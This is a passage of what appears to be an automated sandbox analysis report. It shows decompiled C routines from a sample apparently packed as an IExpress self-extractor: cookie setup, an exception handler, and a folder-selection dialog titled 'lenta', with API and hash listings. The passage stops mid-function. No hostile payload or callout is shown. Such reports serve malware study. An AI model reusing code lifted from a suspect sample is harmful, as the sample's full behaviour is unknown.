                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                              • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                              • Opcode ID: e23733f61de665d2f839644c00b660b9ab240f6cbb7b625f2d86e5000da0a9e9
                                                                                                                                                                                                                                              • Instruction ID: 7caba7aa05e971f8a602842d2c49e711f0cbe7b2fb5d1fd4883e483653bc160c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e23733f61de665d2f839644c00b660b9ab240f6cbb7b625f2d86e5000da0a9e9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E621F973B442057BEB205BA99C4AFBF77BCEBC6B11F108419FA0EE6181D7748841A261
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00977155() {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				struct _FILETIME _v16;
                                                                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                                                                              				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				signed int _t36;
                                                                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                              				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                              				_t23 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                              					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                              					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                              					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                              					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                              					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                              					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                              					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                              					_t39 = _t36;
                                                                                                                                                                                                                                              					if(_t36 == 0xbb40e64e || ( *0x978004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                              						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                              						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0x978004 = _t39;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t37 =  !_t36;
                                                                                                                                                                                                                                              				 *0x978008 = _t37;
                                                                                                                                                                                                                                              				return _t37;
                                                                                                                                                                                                                                              			}











                                                                                                                                                                                                                                              0x0097715d
                                                                                                                                                                                                                                              0x00977161
                                                                                                                                                                                                                                              0x00977165
                                                                                                                                                                                                                                              0x00977178
                                                                                                                                                                                                                                              0x00977182
                                                                                                                                                                                                                                              0x0097718e
                                                                                                                                                                                                                                              0x00977197
                                                                                                                                                                                                                                              0x009771a0
                                                                                                                                                                                                                                              0x009771b1
                                                                                                                                                                                                                                              0x009771b8
                                                                                                                                                                                                                                              0x009771c4
                                                                                                                                                                                                                                              0x009771c7
                                                                                                                                                                                                                                              0x009771cb
                                                                                                                                                                                                                                              0x009771d5
                                                                                                                                                                                                                                              0x009771da
                                                                                                                                                                                                                                              0x009771da
                                                                                                                                                                                                                                              0x009771dc
                                                                                                                                                                                                                                              0x009771dc
                                                                                                                                                                                                                                              0x009771e2
                                                                                                                                                                                                                                              0x009771e5
                                                                                                                                                                                                                                              0x009771ee

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00977182
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00977191
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0097719A
                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 009771A3
                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 009771B8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1445889803-0
                                                                                                                                                                                                                                              • Opcode ID: 0ff82697e0d383c60fb4682d5c70b392708cb2c864c972fc5aac47a1e5d15353
                                                                                                                                                                                                                                              • Instruction ID: 8e17d44eca9d809715538ad342fe286bc4373d6db2affc7c1fdc1296e6f67c0c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ff82697e0d383c60fb4682d5c70b392708cb2c864c972fc5aac47a1e5d15353
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10111F72D29208DFDB10DFF8DA4869EB7F4FF48315F914465D409D7210DA309A44DB41
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00976CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                              				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                              			}



                                                                                                                                                                                                                                              0x00976cf7
                                                                                                                                                                                                                                              0x00976d00
                                                                                                                                                                                                                                              0x00976d19

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00976E26,00971000), ref: 00976CF7
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00976E26,?,00976E26,00971000), ref: 00976D00
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409,?,00976E26,00971000), ref: 00976D0B
                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00976E26,00971000), ref: 00976D12
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3231755760-0
                                                                                                                                                                                                                                              • Opcode ID: 9a6a0daac3b18c4ce4dfccda53edf797f91a44764382f6560ab83356d44a05ad
                                                                                                                                                                                                                                              • Instruction ID: 5e6af2b92b5e75bc7558e33ccd16b6c0bf098305c059f199486ce4b8816babf2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a6a0daac3b18c4ce4dfccda53edf797f91a44764382f6560ab83356d44a05ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AD0C93301C108BBFB002BE1EC0CA5D3F28EBC8222F844000F31D82420CA324891EB56
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 76%
                                                                                                                                                                                                                                              			E00973210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				int _t20;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				int _t23;
                                                                                                                                                                                                                                              				char _t24;
                                                                                                                                                                                                                                              				long _t25;
                                                                                                                                                                                                                                              				int _t27;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                                                                              				int _t33;
                                                                                                                                                                                                                                              				int _t34;
                                                                                                                                                                                                                                              				int _t37;
                                                                                                                                                                                                                                              				int _t38;
                                                                                                                                                                                                                                              				int _t39;
                                                                                                                                                                                                                                              				void* _t42;
                                                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                                                              				CHAR* _t49;
                                                                                                                                                                                                                                              				void* _t58;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				struct HWND__* _t64;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t64 = _a4;
                                                                                                                                                                                                                                              				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t6 == 0) {
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					L38:
                                                                                                                                                                                                                                              					EndDialog(_t64, ??);
                                                                                                                                                                                                                                              					L39:
                                                                                                                                                                                                                                              					__eflags = 1;
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t42 = 1;
                                                                                                                                                                                                                                              				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                              				if(_t10 == 0) {
                                                                                                                                                                                                                                              					E009743D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                              					SetWindowTextA(_t64, "lenta");
                                                                                                                                                                                                                                              					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                              					__eflags =  *0x979a40 - _t42; // 0x3
                                                                                                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                                                                                                              						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L36:
                                                                                                                                                                                                                                              					return _t42;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t10 == _t42) {
                                                                                                                                                                                                                                              					_t20 = _a12 - 1;
                                                                                                                                                                                                                                              					__eflags = _t20;
                                                                                                                                                                                                                                              					if(_t20 == 0) {
                                                                                                                                                                                                                                              						_t21 = GetDlgItemTextA(_t64, 0x835, 0x9791e4, 0x104);
                                                                                                                                                                                                                                              						__eflags = _t21;
                                                                                                                                                                                                                                              						if(_t21 == 0) {
                                                                                                                                                                                                                                              							L32:
                                                                                                                                                                                                                                              							_t58 = 0x4bf;
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0x10);
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							L25:
                                                                                                                                                                                                                                              							E009744B9(_t64, _t58);
                                                                                                                                                                                                                                              							goto L39;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t49 = 0x9791e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t23 =  *_t49;
                                                                                                                                                                                                                                              							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                              							__eflags = _t23;
                                                                                                                                                                                                                                              						} while (_t23 != 0);
                                                                                                                                                                                                                                              						__eflags = _t49 - 0x9791e5 - 3;
                                                                                                                                                                                                                                              						if(_t49 - 0x9791e5 < 3) {
                                                                                                                                                                                                                                              							goto L32;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t24 =  *0x9791e5; // 0x3a
                                                                                                                                                                                                                                              						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                              						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                              							L21:
                                                                                                                                                                                                                                              							_t25 = GetFileAttributesA(0x9791e4);
                                                                                                                                                                                                                                              							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                              							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                              								L26:
                                                                                                                                                                                                                                              								E0097658A(0x9791e4, 0x104, 0x971140);
                                                                                                                                                                                                                                              								_t27 = E009758C8(0x9791e4);
                                                                                                                                                                                                                                              								__eflags = _t27;
                                                                                                                                                                                                                                              								if(_t27 != 0) {
                                                                                                                                                                                                                                              									__eflags =  *0x9791e4 - 0x5c;
                                                                                                                                                                                                                                              									if( *0x9791e4 != 0x5c) {
                                                                                                                                                                                                                                              										L30:
                                                                                                                                                                                                                                              										_t30 = E0097597D(0x9791e4, 1, _t64, 1);
                                                                                                                                                                                                                                              										__eflags = _t30;
                                                                                                                                                                                                                                              										if(_t30 == 0) {
                                                                                                                                                                                                                                              											L35:
                                                                                                                                                                                                                                              											_t42 = 1;
                                                                                                                                                                                                                                              											__eflags = 1;
                                                                                                                                                                                                                                              											goto L36;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										L31:
                                                                                                                                                                                                                                              										_t42 = 1;
                                                                                                                                                                                                                                              										EndDialog(_t64, 1);
                                                                                                                                                                                                                                              										goto L36;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									__eflags =  *0x9791e5 - 0x5c;
                                                                                                                                                                                                                                              									if( *0x9791e5 == 0x5c) {
                                                                                                                                                                                                                                              										goto L31;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L30;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0x10);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_t58 = 0x4be;
                                                                                                                                                                                                                                              								goto L25;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t32 = E009744B9(_t64, 0x54a, 0x9791e4, 0, 0x20, 4);
                                                                                                                                                                                                                                              							__eflags = _t32 - 6;
                                                                                                                                                                                                                                              							if(_t32 != 6) {
                                                                                                                                                                                                                                              								goto L35;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t33 = CreateDirectoryA(0x9791e4, 0);
                                                                                                                                                                                                                                              							__eflags = _t33;
                                                                                                                                                                                                                                              							if(_t33 != 0) {
                                                                                                                                                                                                                                              								goto L26;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0x10);
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0x9791e4);
                                                                                                                                                                                                                                              							_t58 = 0x4cb;
                                                                                                                                                                                                                                              							goto L25;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags =  *0x9791e4 - 0x5c;
                                                                                                                                                                                                                                              						if( *0x9791e4 != 0x5c) {
                                                                                                                                                                                                                                              							goto L32;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                                                              						if(_t24 != 0x5c) {
                                                                                                                                                                                                                                              							goto L32;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L21;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t34 = _t20 - 1;
                                                                                                                                                                                                                                              					__eflags = _t34;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						EndDialog(_t64, 0);
                                                                                                                                                                                                                                              						 *0x979124 = 0x800704c7;
                                                                                                                                                                                                                                              						goto L39;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__eflags = _t34 != 0x834;
                                                                                                                                                                                                                                              					if(_t34 != 0x834) {
                                                                                                                                                                                                                                              						goto L36;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t37 = LoadStringA( *0x979a3c, 0x3e8, 0x978598, 0x200);
                                                                                                                                                                                                                                              					__eflags = _t37;
                                                                                                                                                                                                                                              					if(_t37 != 0) {
                                                                                                                                                                                                                                              						_t38 = E00974224(_t64, _t46, _t46);
                                                                                                                                                                                                                                              						__eflags = _t38;
                                                                                                                                                                                                                                              						if(_t38 == 0) {
                                                                                                                                                                                                                                              							goto L36;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t39 = SetDlgItemTextA(_t64, 0x835, 0x9787a0);
                                                                                                                                                                                                                                              						__eflags = _t39;
                                                                                                                                                                                                                                              						if(_t39 != 0) {
                                                                                                                                                                                                                                              							goto L36;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t63 = 0x4c0;
                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                              						E009744B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						goto L38;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t63 = 0x4b1;
                                                                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}

























                                                                                                                                                                                                                                              0x0097321b
                                                                                                                                                                                                                                              0x0097321e
                                                                                                                                                                                                                                              0x00973221
                                                                                                                                                                                                                                              0x0097343c
                                                                                                                                                                                                                                              0x0097343e
                                                                                                                                                                                                                                              0x0097343f
                                                                                                                                                                                                                                              0x00973445
                                                                                                                                                                                                                                              0x00973447
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973447
                                                                                                                                                                                                                                              0x00973229
                                                                                                                                                                                                                                              0x0097322a
                                                                                                                                                                                                                                              0x0097322f
                                                                                                                                                                                                                                              0x009733ec
                                                                                                                                                                                                                                              0x009733f7
                                                                                                                                                                                                                                              0x00973410
                                                                                                                                                                                                                                              0x00973416
                                                                                                                                                                                                                                              0x0097341d
                                                                                                                                                                                                                                              0x0097342d
                                                                                                                                                                                                                                              0x0097342d
                                                                                                                                                                                                                                              0x00973438
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973438
                                                                                                                                                                                                                                              0x00973237
                                                                                                                                                                                                                                              0x00973243
                                                                                                                                                                                                                                              0x00973243
                                                                                                                                                                                                                                              0x00973246
                                                                                                                                                                                                                                              0x009732ee
                                                                                                                                                                                                                                              0x009732f4
                                                                                                                                                                                                                                              0x009732f6
                                                                                                                                                                                                                                              0x009733d4
                                                                                                                                                                                                                                              0x009733d6
                                                                                                                                                                                                                                              0x009733db
                                                                                                                                                                                                                                              0x009733dc
                                                                                                                                                                                                                                              0x009733de
                                                                                                                                                                                                                                              0x009733df
                                                                                                                                                                                                                                              0x00973370
                                                                                                                                                                                                                                              0x00973372
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973372
                                                                                                                                                                                                                                              0x009732fc
                                                                                                                                                                                                                                              0x00973301
                                                                                                                                                                                                                                              0x00973301
                                                                                                                                                                                                                                              0x00973303
                                                                                                                                                                                                                                              0x00973304
                                                                                                                                                                                                                                              0x00973304
                                                                                                                                                                                                                                              0x0097330a
                                                                                                                                                                                                                                              0x0097330d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973313
                                                                                                                                                                                                                                              0x00973318
                                                                                                                                                                                                                                              0x0097331a
                                                                                                                                                                                                                                              0x00973331
                                                                                                                                                                                                                                              0x00973332
                                                                                                                                                                                                                                              0x0097333a
                                                                                                                                                                                                                                              0x0097333d
                                                                                                                                                                                                                                              0x0097337c
                                                                                                                                                                                                                                              0x00973388
                                                                                                                                                                                                                                              0x0097338f
                                                                                                                                                                                                                                              0x00973394
                                                                                                                                                                                                                                              0x00973396
                                                                                                                                                                                                                                              0x009733a4
                                                                                                                                                                                                                                              0x009733ab
                                                                                                                                                                                                                                              0x009733b6
                                                                                                                                                                                                                                              0x009733be
                                                                                                                                                                                                                                              0x009733c3
                                                                                                                                                                                                                                              0x009733c5
                                                                                                                                                                                                                                              0x00973435
                                                                                                                                                                                                                                              0x00973437
                                                                                                                                                                                                                                              0x00973437
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973437
                                                                                                                                                                                                                                              0x009733c7
                                                                                                                                                                                                                                              0x009733c9
                                                                                                                                                                                                                                              0x009733cc
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009733cc
                                                                                                                                                                                                                                              0x009733ad
                                                                                                                                                                                                                                              0x009733b4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009733b4
                                                                                                                                                                                                                                              0x00973398
                                                                                                                                                                                                                                              0x00973399
                                                                                                                                                                                                                                              0x0097339b
                                                                                                                                                                                                                                              0x0097339c
                                                                                                                                                                                                                                              0x0097339d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097339d
                                                                                                                                                                                                                                              0x0097334c
                                                                                                                                                                                                                                              0x00973351
                                                                                                                                                                                                                                              0x00973354
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097335c
                                                                                                                                                                                                                                              0x00973362
                                                                                                                                                                                                                                              0x00973364
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973366
                                                                                                                                                                                                                                              0x00973367
                                                                                                                                                                                                                                              0x00973369
                                                                                                                                                                                                                                              0x0097336a
                                                                                                                                                                                                                                              0x0097336b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097336b
                                                                                                                                                                                                                                              0x0097331c
                                                                                                                                                                                                                                              0x00973323
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973329
                                                                                                                                                                                                                                              0x0097332b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097332b
                                                                                                                                                                                                                                              0x0097324c
                                                                                                                                                                                                                                              0x0097324c
                                                                                                                                                                                                                                              0x0097324f
                                                                                                                                                                                                                                              0x009732c8
                                                                                                                                                                                                                                              0x009732ce
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009732ce
                                                                                                                                                                                                                                              0x00973251
                                                                                                                                                                                                                                              0x00973256
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973271
                                                                                                                                                                                                                                              0x00973277
                                                                                                                                                                                                                                              0x00973279
                                                                                                                                                                                                                                              0x00973298
                                                                                                                                                                                                                                              0x0097329d
                                                                                                                                                                                                                                              0x0097329f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009732b0
                                                                                                                                                                                                                                              0x009732b6
                                                                                                                                                                                                                                              0x009732b8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009732be
                                                                                                                                                                                                                                              0x00973280
                                                                                                                                                                                                                                              0x00973289
                                                                                                                                                                                                                                              0x0097328e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097328e
                                                                                                                                                                                                                                              0x0097327b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097327b
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadStringA.USER32(000003E8,00978598,00000200), ref: 00973271
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 009733E2
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 009733F7
                                                                                                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00973410
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000836), ref: 00973426
                                                                                                                                                                                                                                              • EnableWindow.USER32(00000000), ref: 0097342D
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 0097343F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$lenta
                                                                                                                                                                                                                                              • API String ID: 2418873061-2614117474
                                                                                                                                                                                                                                              • Opcode ID: db2181067ddef3cde265fa0ec5dbe40a764217701b1f5aeec2a0ea9472e366e5
                                                                                                                                                                                                                                              • Instruction ID: d2631222566477ab9042eacaa003156f7ff818e10298ec1b16b03c0292fb6c89
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db2181067ddef3cde265fa0ec5dbe40a764217701b1f5aeec2a0ea9472e366e5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A851253339824076FB351B355C8CF7F2A4CEBC6B55F90C428F64DA61E1DAA88A41B361
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E00972CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				struct HRSRC__* _t31;
                                                                                                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                                                                                                              				void* _t43;
                                                                                                                                                                                                                                              				void* _t48;
                                                                                                                                                                                                                                              				signed int _t65;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                              				signed int _t67;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t13 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                              				_t65 = 0;
                                                                                                                                                                                                                                              				_t66 = __ecx;
                                                                                                                                                                                                                                              				_t48 = __edx;
                                                                                                                                                                                                                                              				 *0x979a3c = __ecx;
                                                                                                                                                                                                                                              				memset(0x979140, 0, 0x8fc);
                                                                                                                                                                                                                                              				memset(0x978a20, 0, 0x32c);
                                                                                                                                                                                                                                              				memset(0x9788c0, 0, 0x104);
